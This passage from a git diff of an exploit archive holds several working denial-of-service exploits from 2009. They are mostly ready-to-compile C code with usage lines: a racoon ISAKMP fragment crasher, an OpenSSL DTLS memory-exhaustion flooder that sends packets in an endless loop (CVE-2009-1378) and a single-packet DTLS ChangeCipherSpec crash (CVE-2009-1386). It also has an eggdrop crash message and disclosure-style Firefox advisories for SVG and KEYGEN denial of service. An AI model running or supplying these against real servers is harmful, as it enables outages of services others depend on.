*/ +static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 }; + +static void +isa_kmp_dos (char *host) +{ + char buf[sizeof (struct isakmp) + + sizeof (struct isakmp_frag)]; + struct isakmp *hdr; + struct isakmp_frag *frag; + struct sockaddr_in saddr; + struct hostent *hp; + int fd, i, len, n; + + if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (EXIT_FAILURE); + } + + memset (&saddr, 0, sizeof saddr); + memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length); + saddr.sin_family = AF_INET; + saddr.sin_port = htons (PORT_ISAKMP); + + /* formulate request */ + memset (buf, 0, sizeof (buf)); + + hdr = (struct isakmp *) buf; + frag = (struct isakmp_frag *) (hdr + 1); + + for (i = 0; i < sizeof (hdr->i_ck); i++) + hdr->i_ck[i] = (rand () % 255) + 1; + + memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck)); + hdr->v = ISAKMP_VERSION_NUMBER; + hdr->flags = 0; + hdr->etype = ISAKMP_ETYPE_BASE; + hdr->msgid = 0; + hdr->np = ISAKMP_NPTYPE_FRAG; + + len = sizeof (struct isakmp) + sizeof (struct isakmp_frag); + hdr->len = htonl (len); + + frag->len = htons (sizeof (struct isakmp_frag)); + frag->index = 1; + frag->flags = ISAKMP_FRAG_LAST; + + n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr); + if (n < 0 || n != len) + { + fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len); + exit (EXIT_FAILURE); + } + + close (fd); +} + +int +main (int argc, char **argv) +{ + printf ("ipsec-tools racoon frag-isakmp DoS PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + printf ("* crashing racoon... "); + isa_kmp_dos (argv[1]); + printf ("done\n\n"); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2009-05-13] 
diff --git a/platforms/multiple/dos/8695.txt b/platforms/multiple/dos/8695.txt
index fd63a464f..d896d779d 100755
--- a/platforms/multiple/dos/8695.txt
+++ b/platforms/multiple/dos/8695.txt
@@ -1,60 +1,60 @@ -eggdrop/windrop remote crash vulnerability - - * This message: [ Message body ] [ More options ] - * Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ] - -From: Thomas Sader -Date: Fri, 15 May 2009 05:54:08 +0200 - -Affected software ------------------ - -eggdrop (1.6.19 only, not 1.6.19+ctcpfix) -windrop (1.6.19 only, not 1.6.19+ctcpfix) -all eggdrop/windrop versions and packages which apply Nico Goldes -patch for CVE-2007-2807/SA25276 See: [1] - -Vulnerability details ---------------------- - -The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability -in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked -for being non-negative, but that can happen if ctcpbuf is "". That causes -a remote crash vulnerability to be exploited by anyone connected to the same -IRC network as eggdrop. The SA25276 patch has been applied to the eggdrop1.6.18 -debian package and was later adopted by Eggheads into eggdrop1.6.19. - -One possible exploit anyone can send to the IRC server to crash eggdrop: - -PRIVMSG eggdrop :\1\1 - -Resolution ----------- - -Upgrade to eggdrop/windrop 1.6.19+ctcpfix ([2],[3]), the current cvs versions, -or apply the ctcpfix patch at [2] before compiling. - -Disclosure timeline -------------------- - -2009-05-06: Vulnerability discovered and reported to Eggheads. -2009-05-06: Patch committed to cvs. -2009-05-14: New eggdrop and windrop version released with the fix applied. -2009-05-14: Public disclosure. 
- -References ----------- - -[1] http://bugzilla.eggheads.org/show_bug.cgi?id=462 - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157 - http://www.securityfocus.com/bid/24070 - http://secunia.com/advisories/25276 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2807 - -[2] http://www.eggheads.org/downloads/ -[3] http://windrop.sourceforge.net/downloads.html - ---- -Thomas Sader (thommey) - -# milw0rm.com [2009-05-15] +eggdrop/windrop remote crash vulnerability + + * This message: [ Message body ] [ More options ] + * Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ] + +From: Thomas Sader +Date: Fri, 15 May 2009 05:54:08 +0200 + +Affected software +----------------- + +eggdrop (1.6.19 only, not 1.6.19+ctcpfix) +windrop (1.6.19 only, not 1.6.19+ctcpfix) +all eggdrop/windrop versions and packages which apply Nico Goldes +patch for CVE-2007-2807/SA25276 See: [1] + +Vulnerability details +--------------------- + +The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability +in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked +for being non-negative, but that can happen if ctcpbuf is "". That causes +a remote crash vulnerability to be exploited by anyone connected to the same +IRC network as eggdrop. The SA25276 patch has been applied to the eggdrop1.6.18 +debian package and was later adopted by Eggheads into eggdrop1.6.19. + +One possible exploit anyone can send to the IRC server to crash eggdrop: + +PRIVMSG eggdrop :\1\1 + +Resolution +---------- + +Upgrade to eggdrop/windrop 1.6.19+ctcpfix ([2],[3]), the current cvs versions, +or apply the ctcpfix patch at [2] before compiling. + +Disclosure timeline +------------------- + +2009-05-06: Vulnerability discovered and reported to Eggheads. +2009-05-06: Patch committed to cvs. +2009-05-14: New eggdrop and windrop version released with the fix applied. +2009-05-14: Public disclosure. 
+ +References +---------- + +[1] http://bugzilla.eggheads.org/show_bug.cgi?id=462 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157 + http://www.securityfocus.com/bid/24070 + http://secunia.com/advisories/25276 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2807 + +[2] http://www.eggheads.org/downloads/ +[3] http://windrop.sourceforge.net/downloads.html + +--- +Thomas Sader (thommey) + +# milw0rm.com [2009-05-15] diff --git a/platforms/multiple/dos/8720.c b/platforms/multiple/dos/8720.c index f6da7cb9c..759c8a84b 100755 --- a/platforms/multiple/dos/8720.c +++ b/platforms/multiple/dos/8720.c 
@@ -1,144 +1,144 @@ -/* - * cve-2009-1378.c - * - * OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 - * - * In dtls1_process_out_of_seq_message() the check if the current message is - * already buffered was missing. For every new message was memory allocated, - * allowing an attacker to perform an denial of service attack with sending - * out of seq handshake messages until there is no memory left. - * - * Usage: - * - * Pass the host and port of the target DTLS server: - * - * $ gcc cve-2009-1378.c -o cve-2009-1378 - * $ ./cve-2009-1378 1.2.3.4 666 - * - * Notes: - * - * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP - * datagram. If you have a bigger MTU than 1500, feel free to set it. - * - * Complete memory exhaustion may take a while depending on the throughput - * to the target and the amount of memory it has. By default, we'll just - * continue sending datagrams indefinitely. 
- * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define MTU 1500 - -#define IP_HDR_LEN 20 -#define UDP_HDR_LEN 8 -#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN) - -#define put16(b, data) ( \ - (*(b) = ((data) >> 8) & 0xff), \ - (*((b)+1) = (data) & 0xff)) - -int -main(int argc, char **argv) -{ - int sock, ret; - char *ptr, *err; - struct hostent *h; - struct sockaddr_in target; - char buf[MAX_LEN]; - - if (argc < 3) { - err = "Pass the host and port of the target DTLS server"; - printf("[-] Error: %s\n", err); - exit(1); - } - - h = gethostbyname(argv[1]); - if (!h) { - err = "Unknown host specified"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - target.sin_family = h->h_addrtype; - memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - target.sin_port = htons(atoi(argv[2])); - - sock = socket(AF_INET, SOCK_DGRAM, 0); - if (sock == -1) { - err = "Failed creating UDP socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); - if (ret == -1) { - err = "Failed to connect socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ptr = buf; - - /* header */ - memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11); - ptr += 11; - - /* packet length */ - put16(ptr, MAX_LEN - ((ptr - buf) + 2)); - ptr += 2; - - /* client hello */ - memcpy(ptr, "\x01", 1); - ptr += 1; - - /* length */ - memcpy(ptr, "\x00", 1); - ptr += 1; - put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8)); - ptr += 2; - - /* sequence number */ - memcpy(ptr, "\x00\x01", 2); - ptr += 2; - - /* frag offset */ - memcpy(ptr, "\x00\x00\x00", 3); - ptr += 3; - - /* length */ - memcpy(ptr, "\x00", 1); - ptr += 1; - put16(ptr, MAX_LEN - ((ptr - buf) + 2)); - ptr += 2; - - /* payload */ - memset(ptr, '\x00', MAX_LEN - (ptr - buf)); - - printf("[+] Firing loads of packets at %s:%s...\n", 
argv[1], argv[2]); - - while (1) { - send(sock, buf, MAX_LEN, 0); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2009-05-18] +/* + * cve-2009-1378.c + * + * OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 + * + * In dtls1_process_out_of_seq_message() the check if the current message is + * already buffered was missing. For every new message was memory allocated, + * allowing an attacker to perform an denial of service attack with sending + * out of seq handshake messages until there is no memory left. + * + * Usage: + * + * Pass the host and port of the target DTLS server: + * + * $ gcc cve-2009-1378.c -o cve-2009-1378 + * $ ./cve-2009-1378 1.2.3.4 666 + * + * Notes: + * + * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP + * datagram. If you have a bigger MTU than 1500, feel free to set it. + * + * Complete memory exhaustion may take a while depending on the throughput + * to the target and the amount of memory it has. By default, we'll just + * continue sending datagrams indefinitely. 
+ * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MTU 1500 + +#define IP_HDR_LEN 20 +#define UDP_HDR_LEN 8 +#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN) + +#define put16(b, data) ( \ + (*(b) = ((data) >> 8) & 0xff), \ + (*((b)+1) = (data) & 0xff)) + +int +main(int argc, char **argv) +{ + int sock, ret; + char *ptr, *err; + struct hostent *h; + struct sockaddr_in target; + char buf[MAX_LEN]; + + if (argc < 3) { + err = "Pass the host and port of the target DTLS server"; + printf("[-] Error: %s\n", err); + exit(1); + } + + h = gethostbyname(argv[1]); + if (!h) { + err = "Unknown host specified"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + target.sin_family = h->h_addrtype; + memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + target.sin_port = htons(atoi(argv[2])); + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock == -1) { + err = "Failed creating UDP socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); + if (ret == -1) { + err = "Failed to connect socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ptr = buf; + + /* header */ + memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11); + ptr += 11; + + /* packet length */ + put16(ptr, MAX_LEN - ((ptr - buf) + 2)); + ptr += 2; + + /* client hello */ + memcpy(ptr, "\x01", 1); + ptr += 1; + + /* length */ + memcpy(ptr, "\x00", 1); + ptr += 1; + put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8)); + ptr += 2; + + /* sequence number */ + memcpy(ptr, "\x00\x01", 2); + ptr += 2; + + /* frag offset */ + memcpy(ptr, "\x00\x00\x00", 3); + ptr += 3; + + /* length */ + memcpy(ptr, "\x00", 1); + ptr += 1; + put16(ptr, MAX_LEN - ((ptr - buf) + 2)); + ptr += 2; + + /* payload */ + memset(ptr, '\x00', MAX_LEN - (ptr - buf)); + + printf("[+] Firing loads of packets at %s:%s...\n", 
argv[1], argv[2]); + + while (1) { + send(sock, buf, MAX_LEN, 0); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2009-05-18] diff --git a/platforms/multiple/dos/8794.htm b/platforms/multiple/dos/8794.htm index 6e31c93ea..342464028 100755 --- a/platforms/multiple/dos/8794.htm +++ b/platforms/multiple/dos/8794.htm 
@@ -1,100 +1,100 @@ - From the low-hanging-fruit-department - Firefox et al. Denial of Service - All versions supporting SVG -________________________________________________________________________ - -CHEAP Plug : -************************************************************************ -You are invited to participate in HACK.LU 2009, a small but concentrated -luxemburgish security conference. More information : http://www.hack.lu -CFP is open, sponsorship is still possible and warmly welcomed! -************************************************************************ - -Release mode: Forced release. -Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG -WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html -Vendor : http://www.firefox.com -Status : No patch -CVE : none provided -Credit : none -Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 - -Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW -Notification to patch window : x+n - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products : -- Firefox all supporting SVG (didn't care to investigate which, task of the vendor) -- all software packages using mozilla engine and allowing SVG - -I. Background -~~~~~~~~~~~~ -Firefox is a popular internet browser. - -II. Description -~~~~~~~~~~~~~~ -This bug is a typical result of what we call unclamped loop. An "attacker" -will give the Radius value of the Circle attribute a very big value. That -is leetness. 
- -Stack trace : -ntkrnlpa.exe+0x6e9ab -ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 -hal.dll+0x2ef2 -xul.dll!NS_InvokeByIndex_P+0x30c36 -xul.dll!NS_InvokeByIndex_P+0x30e8a -xul.dll!NS_InvokeByIndex_P+0x30e02 -xul.dll!NS_InvokeByIndex_P+0x30f5e -xul.dll!XRE_InitEmbedding+0x7858 -xul.dll!XRE_InitEmbedding+0xf4ee -xul.dll!XRE_TermEmbedding+0x11411 -xul.dll!gfxTextRun::Draw+0xdd4d -xul.dll!gfxTextRun::Draw+0xe1ca -xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 -xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 -xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 -xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 -xul.dll!NS_StringCopy_P+0x9942 -xul.dll!gfxImageSurface::gfxImageSurface+0x3188 -xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 - - -Also produces exceptions in MOZCRT19... -MOZCRT19!modf+0x2570: -600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef - -III. Impact -~~~~~~~~~~ -Browser doesn't respond any longer to any user input, all tabs are no -longer accessible, your work if any (hail to the web 2.0) might be lost. - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - - - - - - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -18/11/2008 : Created bugzilla entry (security) with proof of concept, - description the terms under which ooperate and the planned disclosure date. - -24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG - (seems to be looping in libthebes), but I can definitely confirm - the DoS. - -14/12/2008 : Ask for any action plan and my assessement of considering it low risk - - No reply. - -28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug - to the public [..] a bug like this is more likely to be fixed - by being visible to more people than by leaving it in a closet. - -26/05/2009 : In 2009 I agree; release of this advisory. 
- -# milw0rm.com [2009-05-26] + From the low-hanging-fruit-department + Firefox et al. Denial of Service - All versions supporting SVG +________________________________________________________________________ + +CHEAP Plug : +************************************************************************ +You are invited to participate in HACK.LU 2009, a small but concentrated +luxemburgish security conference. More information : http://www.hack.lu +CFP is open, sponsorship is still possible and warmly welcomed! +************************************************************************ + +Release mode: Forced release. +Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG +WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html +Vendor : http://www.firefox.com +Status : No patch +CVE : none provided +Credit : none +Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 + +Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW +Notification to patch window : x+n + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products : +- Firefox all supporting SVG (didn't care to investigate which, task of the vendor) +- all software packages using mozilla engine and allowing SVG + +I. Background +~~~~~~~~~~~~ +Firefox is a popular internet browser. + +II. Description +~~~~~~~~~~~~~~ +This bug is a typical result of what we call unclamped loop. An "attacker" +will give the Radius value of the Circle attribute a very big value. That +is leetness. 
+ +Stack trace : +ntkrnlpa.exe+0x6e9ab +ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 +hal.dll+0x2ef2 +xul.dll!NS_InvokeByIndex_P+0x30c36 +xul.dll!NS_InvokeByIndex_P+0x30e8a +xul.dll!NS_InvokeByIndex_P+0x30e02 +xul.dll!NS_InvokeByIndex_P+0x30f5e +xul.dll!XRE_InitEmbedding+0x7858 +xul.dll!XRE_InitEmbedding+0xf4ee +xul.dll!XRE_TermEmbedding+0x11411 +xul.dll!gfxTextRun::Draw+0xdd4d +xul.dll!gfxTextRun::Draw+0xe1ca +xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 +xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 +xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 +xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 +xul.dll!NS_StringCopy_P+0x9942 +xul.dll!gfxImageSurface::gfxImageSurface+0x3188 +xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 + + +Also produces exceptions in MOZCRT19... +MOZCRT19!modf+0x2570: +600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef + +III. Impact +~~~~~~~~~~ +Browser doesn't respond any longer to any user input, all tabs are no +longer accessible, your work if any (hail to the web 2.0) might be lost. + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + + + + + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +18/11/2008 : Created bugzilla entry (security) with proof of concept, + description the terms under which ooperate and the planned disclosure date. + +24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG + (seems to be looping in libthebes), but I can definitely confirm + the DoS. + +14/12/2008 : Ask for any action plan and my assessement of considering it low risk + + No reply. + +28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug + to the public [..] a bug like this is more likely to be fixed + by being visible to more people than by leaving it in a closet. + +26/05/2009 : In 2009 I agree; release of this advisory. + +# milw0rm.com [2009-05-26] 
diff --git a/platforms/multiple/dos/880.pl b/platforms/multiple/dos/880.pl index 564cd8b24..4547f7b30 100755 --- a/platforms/multiple/dos/880.pl +++ b/platforms/multiple/dos/880.pl @@ -45,6 +45,6 @@ print $socket "$string"; print "[>] Attack successful - Server killed\n"; -close($socket); - -# milw0rm.com [2005-03-14] +close($socket); + +# milw0rm.com [2005-03-14] diff --git a/platforms/multiple/dos/8822.txt b/platforms/multiple/dos/8822.txt index 2623dc2d9..02a86033c 100755 --- a/platforms/multiple/dos/8822.txt +++ b/platforms/multiple/dos/8822.txt 
@@ -1,120 +1,120 @@ -===8<=================== Original Nachrichtentext =================== -________________________________________________________________________ - - From the very-low-hanging-fruit-department - Firefox Denial of Service (KEYGEN) -________________________________________________________________________ - - -Release mode: Forced release. -Ref : [TZO-27-2009] - Firefox Denial of Service (KEYGEN) -WWW : http://blog.zoller.lu/2009/04/advisory-firefox-denial-of-service.html -Vendor : http://www.firefox.com -Status : No patch -CVE : none provided -Credit : none -Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=469565 - -Security notification reaction rating : There wasn't any appropriate reaction. -Notification to patch window : x+n - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products : -- Firefox 3.0.10 (Windows) -- Likely : All Firefox versions supporting the KEYGEN tag. - -I. Background -~~~~~~~~~~~~ -Firefox is a popular Internet browser from the Mozilla Corporation. In 2007 the -Mozilla Corporation had a revenue of over 75 million dollars [1], out of -which 68 million where made with a search advertising deal, in other words with -the search box in Firefox that defaults to Google. - -I envy the spirit of everyone that works on Firefox code in their spare time, -for free. - -II. Description -~~~~~~~~~~~~~~ -This bug is a simple design bug that results in an endless loop (and interesting -memory leaks). - -Once upon a time Netscape thought it would be a great idea to add the keygen tag -() as a feature to their Browser. The keygen tag offers a simple way -of automatically generating key material using various algorithms. For instance -it is possible to generate RSA, DSA and EC key material. - -"The public key and challenge string are DER encoded as PublicKeyAndChallenge and -then digitally signed with the private key to produce a SignedPublicKeyAndChallenge. 
-The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally -submitted to the server as the value of a name-value pair, where the name is -specified by the NAME attribute of the KEYGEN tag." - -More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag - -This feature includes the automatic submission of the public part to a script, -the crux. The Keygen tag reloads the document by submitting the public key as an argument -to the current URI. Combining this with a javascript body onload() call -(or meta refresh) results in an neat endless loop blocking access to the UI. - -Furthermore memory is leaked during the process. - -III. Impact -~~~~~~~~~~ -The browser doesn't respond any longer to any user input, tabs are no -longer accessible, your work if any might be lost. Restarting the -Firefox process and restoring the previous Firefox session will -re-spawn the tab and start the loop again. - -According to a Bugzilla entry memory is also leaked during the process. - -So let's recap, we have a function that generates key material and looping -causes memory to leak. One might think this should be important enough -to investigate, especially if you know that for DSA for instance, only -a few bits of k can reveal an entire private key. [3] - -Note: I am not saying the memory leaks include key material, seeing the lack -of interest this bugzilla ticket triggered, I have not considered investigating -further. What I am saying is that if security is taken seriously -memory leaks that directly or indirectly happen during key generation -need to be investigated thoroughly. - - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -
- - -
- - -Live : http://secdev.zoller.lu/ff_dos_keygen.html - - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -14/12/2008 : Created bugzilla entry (security) with (the wrong) proof of concept - file. - -14/12/2008 : Attached the correct POC file (mea culpa) and a stack trace and details - of memory corruption that repeatedly occurred during testing the POC - -24/12/2008 : dveditz@mozilla.com comments : "I can definitely confirm the denial - of service aspect, and there's a very minor memory leak (after 9 - hours of CPU time memory use went from 60MB to 360MB). Haven't been - able to reproduce a crash." - -27/05/2009 : The 4 month grace period [2] given is reached. Release of this advisory. - - -[1] http://www.mozilla.org/foundation/documents/mf-2007-audited-financial-statement.pdf -http://www.guidestar.org/FinDocuments//2007/200/097/2007-200097189-047bbaa9-9.pdf -[2] http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html -[3] http://rdist.root.org/?s=dsa - -===8<============== Ende des Original Nachrichtentextes ============= - -# milw0rm.com [2009-05-29] +===8<=================== Original Nachrichtentext =================== +________________________________________________________________________ + + From the very-low-hanging-fruit-department + Firefox Denial of Service (KEYGEN) +________________________________________________________________________ + + +Release mode: Forced release. +Ref : [TZO-27-2009] - Firefox Denial of Service (KEYGEN) +WWW : http://blog.zoller.lu/2009/04/advisory-firefox-denial-of-service.html +Vendor : http://www.firefox.com +Status : No patch +CVE : none provided +Credit : none +Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=469565 + +Security notification reaction rating : There wasn't any appropriate reaction. 
+Notification to patch window : x+n + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products : +- Firefox 3.0.10 (Windows) +- Likely : All Firefox versions supporting the KEYGEN tag. + +I. Background +~~~~~~~~~~~~ +Firefox is a popular Internet browser from the Mozilla Corporation. In 2007 the +Mozilla Corporation had a revenue of over 75 million dollars [1], out of +which 68 million where made with a search advertising deal, in other words with +the search box in Firefox that defaults to Google. + +I envy the spirit of everyone that works on Firefox code in their spare time, +for free. + +II. Description +~~~~~~~~~~~~~~ +This bug is a simple design bug that results in an endless loop (and interesting +memory leaks). + +Once upon a time Netscape thought it would be a great idea to add the keygen tag +() as a feature to their Browser. The keygen tag offers a simple way +of automatically generating key material using various algorithms. For instance +it is possible to generate RSA, DSA and EC key material. + +"The public key and challenge string are DER encoded as PublicKeyAndChallenge and +then digitally signed with the private key to produce a SignedPublicKeyAndChallenge. +The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally +submitted to the server as the value of a name-value pair, where the name is +specified by the NAME attribute of the KEYGEN tag." + +More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag + +This feature includes the automatic submission of the public part to a script, +the crux. The Keygen tag reloads the document by submitting the public key as an argument +to the current URI. Combining this with a javascript body onload() call +(or meta refresh) results in an neat endless loop blocking access to the UI. + +Furthermore memory is leaked during the process. + +III. 
Impact +~~~~~~~~~~ +The browser doesn't respond any longer to any user input, tabs are no +longer accessible, your work if any might be lost. Restarting the +Firefox process and restoring the previous Firefox session will +re-spawn the tab and start the loop again. + +According to a Bugzilla entry memory is also leaked during the process. + +So let's recap, we have a function that generates key material and looping +causes memory to leak. One might think this should be important enough +to investigate, especially if you know that for DSA for instance, only +a few bits of k can reveal an entire private key. [3] + +Note: I am not saying the memory leaks include key material, seeing the lack +of interest this bugzilla ticket triggered, I have not considered investigating +further. What I am saying is that if security is taken seriously +memory leaks that directly or indirectly happen during key generation +need to be investigated thoroughly. + + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +
+ + +
+ + +Live : http://secdev.zoller.lu/ff_dos_keygen.html + + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +14/12/2008 : Created bugzilla entry (security) with (the wrong) proof of concept + file. + +14/12/2008 : Attached the correct POC file (mea culpa) and a stack trace and details + of memory corruption that repeatedly occurred during testing the POC + +24/12/2008 : dveditz@mozilla.com comments : "I can definitely confirm the denial + of service aspect, and there's a very minor memory leak (after 9 + hours of CPU time memory use went from 60MB to 360MB). Haven't been + able to reproduce a crash." + +27/05/2009 : The 4 month grace period [2] given is reached. Release of this advisory. + + +[1] http://www.mozilla.org/foundation/documents/mf-2007-audited-financial-statement.pdf +http://www.guidestar.org/FinDocuments//2007/200/097/2007-200097189-047bbaa9-9.pdf +[2] http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html +[3] http://rdist.root.org/?s=dsa + +===8<============== Ende des Original Nachrichtentextes ============= + +# milw0rm.com [2009-05-29] diff --git a/platforms/multiple/dos/8873.c b/platforms/multiple/dos/8873.c index 7fa96a4a9..943b1635e 100755 --- a/platforms/multiple/dos/8873.c +++ b/platforms/multiple/dos/8873.c 
@@ -1,92 +1,92 @@ -/* - * cve-2009-1386.c - * - * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 - * - * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as - * the first record instead of ClientHello. - * - * Usage: - * - * Pass the host and port of the target DTLS server: - * - * $ gcc cve-2009-1386.c -o cve-2009-1386 - * $ ./cve-2009-1386 1.2.3.4 666 - * - * Notes: - * - * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this - * only requires a single ChangeCipherSpec datagram, but affects an older - * version of OpenSSL. - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int -main(int argc, char **argv) -{ - int sock, ret; - char *ptr, *err; - struct hostent *h; - struct sockaddr_in target; - char buf[64]; - - if (argc < 3) { - err = "Pass the host and port of the target DTLS server"; - printf("[-] Error: %s\n", err); - exit(1); - } - - h = gethostbyname(argv[1]); - if (!h) { - err = "Unknown host specified"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - target.sin_family = h->h_addrtype; - memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - target.sin_port = htons(atoi(argv[2])); - - sock = socket(AF_INET, SOCK_DGRAM, 0); - if (sock == -1) { - err = "Failed creating UDP socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); - if (ret == -1) { - err = "Failed to connect socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14); - - printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]); - - send(sock, buf, 14, 0); - - close(sock); - - return 0; -} - -// milw0rm.com 
